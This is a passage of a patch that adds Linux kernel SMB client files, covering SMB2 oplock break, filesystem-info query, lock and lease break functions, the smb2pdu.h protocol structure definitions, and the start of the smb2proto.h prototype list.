++		  __u8 oplock_level)
++{
++	struct smb_rqst rqst;
++	int rc;
++	struct smb2_oplock_break *req = NULL;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	int flags = CIFS_OBREAK_OP;
++	unsigned int total_len;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++
++	cifs_dbg(FYI, "SMB2_oplock_break\n");
++	rc = smb2_plain_req_init(SMB2_OPLOCK_BREAK, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	req->VolatileFid = volatile_fid;
++	req->PersistentFid = persistent_fid;
++	req->OplockLevel = oplock_level;
++	req->hdr.CreditRequest = cpu_to_le16(1);
++
++	flags |= CIFS_NO_RSP_BUF;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buf_type, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_OPLOCK_BREAK_HE);
++		cifs_dbg(FYI, "Send error in Oplock Break = %d\n", rc);
++	}
++
++	return rc;
++}
++
++void
++smb2_copy_fs_info_to_kstatfs(struct smb2_fs_full_size_info *pfs_inf,
++			     struct kstatfs *kst)
++{
++	kst->f_bsize = le32_to_cpu(pfs_inf->BytesPerSector) *
++			  le32_to_cpu(pfs_inf->SectorsPerAllocationUnit);
++	kst->f_blocks = le64_to_cpu(pfs_inf->TotalAllocationUnits);
++	kst->f_bfree  = kst->f_bavail =
++			le64_to_cpu(pfs_inf->CallerAvailableAllocationUnits);
++	return;
++}
++
++static void
++copy_posix_fs_info_to_kstatfs(FILE_SYSTEM_POSIX_INFO *response_data,
++			struct kstatfs *kst)
++{
++	kst->f_bsize = le32_to_cpu(response_data->BlockSize);
++	kst->f_blocks = le64_to_cpu(response_data->TotalBlocks);
++	kst->f_bfree =  le64_to_cpu(response_data->BlocksAvail);
++	if (response_data->UserBlocksAvail == cpu_to_le64(-1))
++		kst->f_bavail = kst->f_bfree;
++	else
++		kst->f_bavail = le64_to_cpu(response_data->UserBlocksAvail);
++	if (response_data->TotalFileNodes != cpu_to_le64(-1))
++		kst->f_files = le64_to_cpu(response_data->TotalFileNodes);
++	if (response_data->FreeFileNodes != cpu_to_le64(-1))
++		kst->f_ffree = le64_to_cpu(response_data->FreeFileNodes);
++
++	return;
++}
++
++static int
++build_qfs_info_req(struct kvec *iov, struct cifs_tcon *tcon,
++		   struct TCP_Server_Info *server,
++		   int level, int outbuf_len, u64 persistent_fid,
++		   u64 volatile_fid)
++{
++	int rc;
++	struct smb2_query_info_req *req;
++	unsigned int total_len;
++
++	cifs_dbg(FYI, "Query FSInfo level %d\n", level);
++
++	if ((tcon->ses == NULL) || server == NULL)
++		return -EIO;
++
++	rc = smb2_plain_req_init(SMB2_QUERY_INFO, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->InfoType = SMB2_O_INFO_FILESYSTEM;
++	req->FileInfoClass = level;
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++	/* 1 for pad */
++	req->InputBufferOffset =
++			cpu_to_le16(sizeof(struct smb2_query_info_req) - 1);
++	req->OutputBufferLength = cpu_to_le32(
++		outbuf_len + sizeof(struct smb2_query_info_rsp) - 1);
++
++	iov->iov_base = (char *)req;
++	iov->iov_len = total_len;
++	return 0;
++}
++
++int
++SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
++	      u64 persistent_fid, u64 volatile_fid, struct kstatfs *fsdata)
++{
++	struct smb_rqst rqst;
++	struct smb2_query_info_rsp *rsp = NULL;
++	struct kvec iov;
++	struct kvec rsp_iov;
++	int rc = 0;
++	int resp_buftype;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	FILE_SYSTEM_POSIX_INFO *info = NULL;
++	int flags = 0;
++
++	rc = build_qfs_info_req(&iov, tcon, server,
++				FS_POSIX_INFORMATION,
++				sizeof(FILE_SYSTEM_POSIX_INFO),
++				persistent_fid, volatile_fid);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = &iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	cifs_small_buf_release(iov.iov_base);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
++		goto posix_qfsinf_exit;
++	}
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++
++	info = (FILE_SYSTEM_POSIX_INFO *)(
++		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
++	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
++			       le32_to_cpu(rsp->OutputBufferLength), &rsp_iov,
++			       sizeof(FILE_SYSTEM_POSIX_INFO));
++	if (!rc)
++		copy_posix_fs_info_to_kstatfs(info, fsdata);
++
++posix_qfsinf_exit:
++	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++int
++SMB2_QFS_info(const unsigned int xid, struct cifs_tcon *tcon,
++	      u64 persistent_fid, u64 volatile_fid, struct kstatfs *fsdata)
++{
++	struct smb_rqst rqst;
++	struct smb2_query_info_rsp *rsp = NULL;
++	struct kvec iov;
++	struct kvec rsp_iov;
++	int rc = 0;
++	int resp_buftype;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	struct smb2_fs_full_size_info *info = NULL;
++	int flags = 0;
++
++	rc = build_qfs_info_req(&iov, tcon, server,
++				FS_FULL_SIZE_INFORMATION,
++				sizeof(struct smb2_fs_full_size_info),
++				persistent_fid, volatile_fid);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = &iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	cifs_small_buf_release(iov.iov_base);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
++		goto qfsinf_exit;
++	}
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++
++	info = (struct smb2_fs_full_size_info *)(
++		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
++	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
++			       le32_to_cpu(rsp->OutputBufferLength), &rsp_iov,
++			       sizeof(struct smb2_fs_full_size_info));
++	if (!rc)
++		smb2_copy_fs_info_to_kstatfs(info, fsdata);
++
++qfsinf_exit:
++	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++int
++SMB2_QFS_attr(const unsigned int xid, struct cifs_tcon *tcon,
++	      u64 persistent_fid, u64 volatile_fid, int level)
++{
++	struct smb_rqst rqst;
++	struct smb2_query_info_rsp *rsp = NULL;
++	struct kvec iov;
++	struct kvec rsp_iov;
++	int rc = 0;
++	int resp_buftype, max_len, min_len;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	unsigned int rsp_len, offset;
++	int flags = 0;
++
++	if (level == FS_DEVICE_INFORMATION) {
++		max_len = sizeof(FILE_SYSTEM_DEVICE_INFO);
++		min_len = sizeof(FILE_SYSTEM_DEVICE_INFO);
++	} else if (level == FS_ATTRIBUTE_INFORMATION) {
++		max_len = sizeof(FILE_SYSTEM_ATTRIBUTE_INFO);
++		min_len = MIN_FS_ATTR_INFO_SIZE;
++	} else if (level == FS_SECTOR_SIZE_INFORMATION) {
++		max_len = sizeof(struct smb3_fs_ss_info);
++		min_len = sizeof(struct smb3_fs_ss_info);
++	} else if (level == FS_VOLUME_INFORMATION) {
++		max_len = sizeof(struct smb3_fs_vol_info) + MAX_VOL_LABEL_LEN;
++		min_len = sizeof(struct smb3_fs_vol_info);
++	} else {
++		cifs_dbg(FYI, "Invalid qfsinfo level %d\n", level);
++		return -EINVAL;
++	}
++
++	rc = build_qfs_info_req(&iov, tcon, server,
++				level, max_len,
++				persistent_fid, volatile_fid);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = &iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	cifs_small_buf_release(iov.iov_base);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
++		goto qfsattr_exit;
++	}
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++
++	rsp_len = le32_to_cpu(rsp->OutputBufferLength);
++	offset = le16_to_cpu(rsp->OutputBufferOffset);
++	rc = smb2_validate_iov(offset, rsp_len, &rsp_iov, min_len);
++	if (rc)
++		goto qfsattr_exit;
++
++	if (level == FS_ATTRIBUTE_INFORMATION)
++		memcpy(&tcon->fsAttrInfo, offset
++			+ (char *)rsp, min_t(unsigned int,
++			rsp_len, max_len));
++	else if (level == FS_DEVICE_INFORMATION)
++		memcpy(&tcon->fsDevInfo, offset
++			+ (char *)rsp, sizeof(FILE_SYSTEM_DEVICE_INFO));
++	else if (level == FS_SECTOR_SIZE_INFORMATION) {
++		struct smb3_fs_ss_info *ss_info = (struct smb3_fs_ss_info *)
++			(offset + (char *)rsp);
++		tcon->ss_flags = le32_to_cpu(ss_info->Flags);
++		tcon->perf_sector_size =
++			le32_to_cpu(ss_info->PhysicalBytesPerSectorForPerf);
++	} else if (level == FS_VOLUME_INFORMATION) {
++		struct smb3_fs_vol_info *vol_info = (struct smb3_fs_vol_info *)
++			(offset + (char *)rsp);
++		tcon->vol_serial_number = vol_info->VolumeSerialNumber;
++		tcon->vol_create_time = vol_info->VolumeCreationTime;
++	}
++
++qfsattr_exit:
++	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++int
++smb2_lockv(const unsigned int xid, struct cifs_tcon *tcon,
++	   const __u64 persist_fid, const __u64 volatile_fid, const __u32 pid,
++	   const __u32 num_lock, struct smb2_lock_element *buf)
++{
++	struct smb_rqst rqst;
++	int rc = 0;
++	struct smb2_lock_req *req = NULL;
++	struct kvec iov[2];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++	unsigned int count;
++	int flags = CIFS_NO_RSP_BUF;
++	unsigned int total_len;
++	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
++
++	cifs_dbg(FYI, "smb2_lockv num lock %d\n", num_lock);
++
++	rc = smb2_plain_req_init(SMB2_LOCK, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	req->hdr.Id.SyncId.ProcessId = cpu_to_le32(pid);
++	req->LockCount = cpu_to_le16(num_lock);
++
++	req->PersistentFileId = persist_fid;
++	req->VolatileFileId = volatile_fid;
++
++	count = num_lock * sizeof(struct smb2_lock_element);
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len - sizeof(struct smb2_lock_element);
++	iov[1].iov_base = (char *)buf;
++	iov[1].iov_len = count;
++
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_locks);
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 2;
++
++	rc = cifs_send_recv(xid, tcon->ses, server,
++			    &rqst, &resp_buf_type, flags,
++			    &rsp_iov);
++	cifs_small_buf_release(req);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in smb2_lockv = %d\n", rc);
++		cifs_stats_fail_inc(tcon, SMB2_LOCK_HE);
++		trace_smb3_lock_err(xid, persist_fid, tcon->tid,
++				    tcon->ses->Suid, rc);
++	}
++
++	return rc;
++}
++
++int
++SMB2_lock(const unsigned int xid, struct cifs_tcon *tcon,
++	  const __u64 persist_fid, const __u64 volatile_fid, const __u32 pid,
++	  const __u64 length, const __u64 offset, const __u32 lock_flags,
++	  const bool wait)
++{
++	struct smb2_lock_element lock;
++
++	lock.Offset = cpu_to_le64(offset);
++	lock.Length = cpu_to_le64(length);
++	lock.Flags = cpu_to_le32(lock_flags);
++	if (!wait && lock_flags != SMB2_LOCKFLAG_UNLOCK)
++		lock.Flags |= cpu_to_le32(SMB2_LOCKFLAG_FAIL_IMMEDIATELY);
++
++	return smb2_lockv(xid, tcon, persist_fid, volatile_fid, pid, 1, &lock);
++}
++
++int
++SMB2_lease_break(const unsigned int xid, struct cifs_tcon *tcon,
++		 __u8 *lease_key, const __le32 lease_state)
++{
++	struct smb_rqst rqst;
++	int rc;
++	struct smb2_lease_ack *req = NULL;
++	struct cifs_ses *ses = tcon->ses;
++	int flags = CIFS_OBREAK_OP;
++	unsigned int total_len;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++	__u64 *please_key_high;
++	__u64 *please_key_low;
++	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
++
++	cifs_dbg(FYI, "SMB2_lease_break\n");
++	rc = smb2_plain_req_init(SMB2_OPLOCK_BREAK, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	req->hdr.CreditRequest = cpu_to_le16(1);
++	req->StructureSize = cpu_to_le16(36);
++	total_len += 12;
++
++	memcpy(req->LeaseKey, lease_key, 16);
++	req->LeaseState = lease_state;
++
++	flags |= CIFS_NO_RSP_BUF;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buf_type, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++
++	please_key_low = (__u64 *)lease_key;
++	please_key_high = (__u64 *)(lease_key+8);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_OPLOCK_BREAK_HE);
++		trace_smb3_lease_err(le32_to_cpu(lease_state), tcon->tid,
++			ses->Suid, *please_key_low, *please_key_high, rc);
++		cifs_dbg(FYI, "Send error in Lease Break = %d\n", rc);
++	} else
++		trace_smb3_lease_done(le32_to_cpu(lease_state), tcon->tid,
++			ses->Suid, *please_key_low, *please_key_high);
++
++	return rc;
++}
+diff --git a/fs/smb/client/smb2pdu.h b/fs/smb/client/smb2pdu.h
+new file mode 100644
+index 0000000000000..1237bb86e93a8
+--- /dev/null
++++ b/fs/smb/client/smb2pdu.h
+@@ -0,0 +1,434 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2009, 2013
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++
++#ifndef _SMB2PDU_H
++#define _SMB2PDU_H
++
++#include <net/sock.h>
++#include "cifsacl.h"
++
++/* 52 transform hdr + 64 hdr + 88 create rsp */
++#define SMB2_TRANSFORM_HEADER_SIZE 52
++#define MAX_SMB2_HDR_SIZE 204
++
++/* The total header size for SMB2 read and write */
++#define SMB2_READWRITE_PDU_HEADER_SIZE (48 + sizeof(struct smb2_hdr))
++
++/* See MS-SMB2 2.2.43 */
++struct smb2_rdma_transform {
++	__le16 RdmaDescriptorOffset;
++	__le16 RdmaDescriptorLength;
++	__le32 Channel; /* for values see channel description in smb2 read above */
++	__le16 TransformCount;
++	__le16 Reserved1;
++	__le32 Reserved2;
++} __packed;
++
++/* TransformType */
++#define SMB2_RDMA_TRANSFORM_TYPE_ENCRYPTION	0x0001
++#define SMB2_RDMA_TRANSFORM_TYPE_SIGNING	0x0002
++
++struct smb2_rdma_crypto_transform {
++	__le16	TransformType;
++	__le16	SignatureLength;
++	__le16	NonceLength;
++	__u16	Reserved;
++	__u8	Signature[]; /* variable length */
++	/* u8 Nonce[] */
++	/* followed by padding */
++} __packed;
++
++/*
++ *	Definitions for SMB2 Protocol Data Units (network frames)
++ *
++ *  See MS-SMB2.PDF specification for protocol details.
++ *  The Naming convention is the lower case version of the SMB2
++ *  command code name for the struct. Note that structures must be packed.
++ *
++ */
++
++#define COMPOUND_FID 0xFFFFFFFFFFFFFFFFULL
++
++#define SMB2_SYMLINK_STRUCT_SIZE \
++	(sizeof(struct smb2_err_rsp) - 1 + sizeof(struct smb2_symlink_err_rsp))
++
++#define SYMLINK_ERROR_TAG 0x4c4d5953
++
++struct smb2_symlink_err_rsp {
++	__le32 SymLinkLength;
++	__le32 SymLinkErrorTag;
++	__le32 ReparseTag;
++	__le16 ReparseDataLength;
++	__le16 UnparsedPathLength;
++	__le16 SubstituteNameOffset;
++	__le16 SubstituteNameLength;
++	__le16 PrintNameOffset;
++	__le16 PrintNameLength;
++	__le32 Flags;
++	__u8  PathBuffer[];
++} __packed;
++
++/* SMB 3.1.1 and later dialects. See MS-SMB2 section 2.2.2.1 */
++struct smb2_error_context_rsp {
++	__le32 ErrorDataLength;
++	__le32 ErrorId;
++	__u8  ErrorContextData; /* ErrorDataLength long array */
++} __packed;
++
++/* ErrorId values */
++#define SMB2_ERROR_ID_DEFAULT		0x00000000
++#define SMB2_ERROR_ID_SHARE_REDIRECT	cpu_to_le32(0x72645253)	/* "rdRS" */
++
++/* Defines for Type field below (see MS-SMB2 2.2.2.2.2.1) */
++#define MOVE_DST_IPADDR_V4	cpu_to_le32(0x00000001)
++#define MOVE_DST_IPADDR_V6	cpu_to_le32(0x00000002)
++
++struct move_dst_ipaddr {
++	__le32 Type;
++	__u32  Reserved;
++	__u8   address[16]; /* IPv4 followed by 12 bytes rsvd or IPv6 address */
++} __packed;
++
++struct share_redirect_error_context_rsp {
++	__le32 StructureSize;
++	__le32 NotificationType;
++	__le32 ResourceNameOffset;
++	__le32 ResourceNameLength;
++	__le16 Reserved;
++	__le16 TargetType;
++	__le32 IPAddrCount;
++	struct move_dst_ipaddr IpAddrMoveList[];
++	/* __u8 ResourceName[] */ /* Name of share as counted Unicode string */
++} __packed;
++
++/*
++ * Maximum number of iovs we need for an open/create request.
++ * [0] : struct smb2_create_req
++ * [1] : path
++ * [2] : lease context
++ * [3] : durable context
++ * [4] : posix context
++ * [5] : time warp context
++ * [6] : query id context
++ * [7] : compound padding
++ */
++#define SMB2_CREATE_IOV_SIZE 8
++
++/*
++ * Maximum size of a SMB2_CREATE response is 64 (smb2 header) +
++ * 88 (fixed part of create response) + 520 (path) + 208 (contexts) +
++ * 2 bytes of padding.
++ */
++#define MAX_SMB2_CREATE_RESPONSE_SIZE 880
++
++#define SMB2_LEASE_READ_CACHING_HE	0x01
++#define SMB2_LEASE_HANDLE_CACHING_HE	0x02
++#define SMB2_LEASE_WRITE_CACHING_HE	0x04
++
++struct create_durable {
++	struct create_context ccontext;
++	__u8   Name[8];
++	union {
++		__u8  Reserved[16];
++		struct {
++			__u64 PersistentFileId;
++			__u64 VolatileFileId;
++		} Fid;
++	} Data;
++} __packed;
++
++/* See MS-SMB2 2.2.13.2.11 */
++/* Flags */
++#define SMB2_DHANDLE_FLAG_PERSISTENT	0x00000002
++struct durable_context_v2 {
++	__le32 Timeout;
++	__le32 Flags;
++	__u64 Reserved;
++	__u8 CreateGuid[16];
++} __packed;
++
++struct create_durable_v2 {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct durable_context_v2 dcontext;
++} __packed;
++
++/* See MS-SMB2 2.2.13.2.12 */
++struct durable_reconnect_context_v2 {
++	struct {
++		__u64 PersistentFileId;
++		__u64 VolatileFileId;
++	} Fid;
++	__u8 CreateGuid[16];
++	__le32 Flags; /* see above DHANDLE_FLAG_PERSISTENT */
++} __packed;
++
++/* See MS-SMB2 2.2.14.2.9 */
++struct create_on_disk_id {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le64 DiskFileId;
++	__le64 VolumeId;
++	__u32  Reserved[4];
++} __packed;
++
++/* See MS-SMB2 2.2.14.2.12 */
++struct durable_reconnect_context_v2_rsp {
++	__le32 Timeout;
++	__le32 Flags; /* see above DHANDLE_FLAG_PERSISTENT */
++} __packed;
++
++struct create_durable_handle_reconnect_v2 {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct durable_reconnect_context_v2 dcontext;
++	__u8   Pad[4];
++} __packed;
++
++/* See MS-SMB2 2.2.13.2.5 */
++struct crt_twarp_ctxt {
++	struct create_context ccontext;
++	__u8	Name[8];
++	__le64	Timestamp;
++
++} __packed;
++
++/* See MS-SMB2 2.2.13.2.9 */
++struct crt_query_id_ctxt {
++	struct create_context ccontext;
++	__u8	Name[8];
++} __packed;
++
++struct crt_sd_ctxt {
++	struct create_context ccontext;
++	__u8	Name[8];
++	struct smb3_sd sd;
++} __packed;
++
++
++#define COPY_CHUNK_RES_KEY_SIZE	24
++struct resume_key_req {
++	char ResumeKey[COPY_CHUNK_RES_KEY_SIZE];
++	__le32	ContextLength;	/* MBZ */
++	char	Context[];	/* ignored, Windows sets to 4 bytes of zero */
++} __packed;
++
++/* this goes in the ioctl buffer when doing a copychunk request */
++struct copychunk_ioctl {
++	char SourceKey[COPY_CHUNK_RES_KEY_SIZE];
++	__le32 ChunkCount; /* we are only sending 1 */
++	__le32 Reserved;
++	/* array will only be one chunk long for us */
++	__le64 SourceOffset;
++	__le64 TargetOffset;
++	__le32 Length; /* how many bytes to copy */
++	__u32 Reserved2;
++} __packed;
++
++struct copychunk_ioctl_rsp {
++	__le32 ChunksWritten;
++	__le32 ChunkBytesWritten;
++	__le32 TotalBytesWritten;
++} __packed;
++
++/* See MS-FSCC 2.3.29 and 2.3.30 */
++struct get_retrieval_pointer_count_req {
++	__le64 StartingVcn; /* virtual cluster number (signed) */
++} __packed;
++
++struct get_retrieval_pointer_count_rsp {
++	__le32 ExtentCount;
++} __packed;
++
++/*
++ * See MS-FSCC 2.3.33 and 2.3.34
++ * request is the same as get_retrieval_point_count_req struct above
++ */
++struct smb3_extents {
++	__le64 NextVcn;
++	__le64 Lcn; /* logical cluster number */
++} __packed;
++
++struct get_retrieval_pointers_refcount_rsp {
++	__le32 ExtentCount;
++	__u32  Reserved;
++	__le64 StartingVcn;
++	struct smb3_extents extents[];
++} __packed;
++
++/* See MS-DFSC 2.2.2 */
++struct fsctl_get_dfs_referral_req {
++	__le16 MaxReferralLevel;
++	__u8 RequestFileName[];
++} __packed;
++
++/* DFS response is struct get_dfs_refer_rsp */
++
++/* See MS-SMB2 2.2.31.3 */
++struct network_resiliency_req {
++	__le32 Timeout;
++	__le32 Reserved;
++} __packed;
++/* There is no buffer for the response ie no struct network_resiliency_rsp */
++
++#define RSS_CAPABLE	cpu_to_le32(0x00000001)
++#define RDMA_CAPABLE	cpu_to_le32(0x00000002)
++
++#define INTERNETWORK	cpu_to_le16(0x0002)
++#define INTERNETWORKV6	cpu_to_le16(0x0017)
++
++struct network_interface_info_ioctl_rsp {
++	__le32 Next; /* next interface. zero if this is last one */
++	__le32 IfIndex;
++	__le32 Capability; /* RSS or RDMA Capable */
++	__le32 Reserved;
++	__le64 LinkSpeed;
++	__le16 Family;
++	__u8 Buffer[126];
++} __packed;
++
++struct iface_info_ipv4 {
++	__be16 Port;
++	__be32 IPv4Address;
++	__be64 Reserved;
++} __packed;
++
++struct iface_info_ipv6 {
++	__be16 Port;
++	__be32 FlowInfo;
++	__u8   IPv6Address[16];
++	__be32 ScopeId;
++} __packed;
++
++#define NO_FILE_ID 0xFFFFFFFFFFFFFFFFULL /* general ioctls to srv not to file */
++
++struct compress_ioctl {
++	__le16 CompressionState; /* See cifspdu.h for possible flag values */
++} __packed;
++
++/*
++ * Maximum number of iovs we need for an ioctl request.
++ * [0] : struct smb2_ioctl_req
++ * [1] : in_data
++ */
++#define SMB2_IOCTL_IOV_SIZE 2
++
++/*
++ *	PDU query infolevel structure definitions
++ *	BB consider moving to a different header
++ */
++
++struct smb2_file_full_ea_info { /* encoding of response for level 15 */
++	__le32 next_entry_offset;
++	__u8   flags;
++	__u8   ea_name_length;
++	__le16 ea_value_length;
++	char   ea_data[]; /* \0 terminated name plus value */
++} __packed; /* level 15 Set */
++
++struct smb2_file_reparse_point_info {
++	__le64 IndexNumber;
++	__le32 Tag;
++} __packed;
++
++struct smb2_file_network_open_info {
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 AllocationSize;
++	__le64 EndOfFile;
++	__le32 Attributes;
++	__le32 Reserved;
++} __packed; /* level 34 Query also similar returned in close rsp and open rsp */
++
++/* See MS-FSCC 2.4.21 */
++struct smb2_file_id_information {
++	__le64	VolumeSerialNumber;
++	__u64  PersistentFileId; /* opaque endianness */
++	__u64  VolatileFileId; /* opaque endianness */
++} __packed; /* level 59 */
++
++/* See MS-FSCC 2.4.18 */
++struct smb2_file_id_extd_directory_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 FileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* EA size */
++	__le32 ReparsePointTag; /* valid if FILE_ATTR_REPARSE_POINT set in FileAttributes */
++	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit */
++	char FileName[1];
++} __packed; /* level 60 */
++
++extern char smb2_padding[7];
++
++/* equivalent of the contents of SMB3.1.1 POSIX open context response */
++struct create_posix_rsp {
++	u32 nlink;
++	u32 reparse_tag;
++	u32 mode;
++	struct cifs_sid owner; /* var-sized on the wire */
++	struct cifs_sid group; /* var-sized on the wire */
++} __packed;
++
++#define SMB2_QUERY_DIRECTORY_IOV_SIZE 2
++
++/*
++ * SMB2-only POSIX info level for query dir
++ *
++ * See posix_info_sid_size(), posix_info_extra_size() and
++ * posix_info_parse() to help with the handling of this struct.
++ */
++struct smb2_posix_info {
++	__le32 NextEntryOffset;
++	__u32 Ignored;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 DosAttributes;
++	__le64 Inode;
++	__le32 DeviceId;
++	__le32 Zero;
++	/* beginning of POSIX Create Context Response */
++	__le32 HardLinks;
++	__le32 ReparseTag;
++	__le32 Mode;
++	/*
++	 * var sized owner SID
++	 * var sized group SID
++	 * le32 filenamelength
++	 * u8  filename[]
++	 */
++} __packed;
++
++/*
++ * Parsed version of the above struct. Allows direct access to the
++ * variable length fields
++ */
++struct smb2_posix_info_parsed {
++	const struct smb2_posix_info *base;
++	size_t size;
++	struct cifs_sid owner;
++	struct cifs_sid group;
++	int name_len;
++	const u8 *name;
++};
++
++#endif				/* _SMB2PDU_H */
+diff --git a/fs/smb/client/smb2proto.h b/fs/smb/client/smb2proto.h
+new file mode 100644
+index 0000000000000..be21b5d26f67e
+--- /dev/null
++++ b/fs/smb/client/smb2proto.h
+@@ -0,0 +1,284 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002, 2011
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++#ifndef _SMB2PROTO_H
++#define _SMB2PROTO_H
++#include <linux/nls.h>
++#include <linux/key-type.h>
++
++struct statfs;
++struct smb_rqst;
++
++/*
++ *****************************************************************
++ * All Prototypes
++ *****************************************************************
++ */
++extern int map_smb2_to_linux_error(char *buf, bool log_err);
++extern int smb2_check_message(char *buf, unsigned int length,
++			      struct TCP_Server_Info *server);
++extern unsigned int smb2_calc_size(void *buf);
++extern char *smb2_get_data_area_len(int *off, int *len,
++				    struct smb2_hdr *shdr);
++extern __le16 *cifs_convert_path_to_utf16(const char *from,
++					  struct cifs_sb_info *cifs_sb);
++
++extern int smb2_verify_signature(struct smb_rqst *, struct TCP_Server_Info *);
++extern int smb2_check_receive(struct mid_q_entry *mid,
++			      struct TCP_Server_Info *server, bool log_error);
++extern struct mid_q_entry *smb2_setup_request(struct cifs_ses *ses,
++					      struct TCP_Server_Info *,
++					      struct smb_rqst *rqst);
++extern struct mid_q_entry *smb2_setup_async_request(
++			struct TCP_Server_Info *server, struct smb_rqst *rqst);
++extern struct cifs_ses *smb2_find_smb_ses(struct TCP_Server_Info *server,
++					   __u64 ses_id);
++extern struct cifs_tcon *smb2_find_smb_tcon(struct TCP_Server_Info *server,
++						__u64 ses_id, __u32  tid);
++extern int smb2_calc_signature(struct smb_rqst *rqst,
++				struct TCP_Server_Info *server,
++				bool allocate_crypto);
++extern int smb3_calc_signature(struct smb_rqst *rqst,
++				struct TCP_Server_Info *server,
++				bool allocate_crypto);
++extern void smb2_echo_request(struct work_struct *work);
++extern __le32 smb2_get_lease_state(struct cifsInodeInfo *cinode);
